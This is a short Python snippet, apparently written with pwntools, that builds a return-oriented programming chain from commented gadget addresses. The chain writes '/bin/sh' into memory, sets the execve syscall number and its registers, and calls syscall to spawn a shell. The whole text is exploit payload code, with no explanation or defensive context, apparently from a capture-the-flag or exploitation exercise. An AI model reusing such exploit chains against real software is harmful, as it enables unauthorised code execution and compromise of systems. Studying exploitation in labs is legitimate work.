payload = p64(0x4cb9c5)
#0x00000000004cb9c5: pop rdx; ret; 
payload += p64(0x5c3070)+p64(0x449a43)
# 0x0000000000449a43: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4a0a24)
# 0x00000000004a0a24: mov qword ptr [rdx], rax; ret; 
payload += p64(0x449a43)
# 0x0000000000449a43: pop rax; ret; 
payload += p64(0x3b)+p64(0x459462)
# 0x459462: pop rsi ; ret
payload += p64(0x0)+p64(0x461794)
# 0x0000000000461794: mov dh, 0x47; pop rdi; ret; 
payload += p64(0x5c3070)+p64(0x4cb9c5)
# 0x00000000004cb9c5: pop rdx; ret; 
payload += p64(0x0)+p64(0x40329b)
# 0x000000000040329b: syscall; 
payload += b''
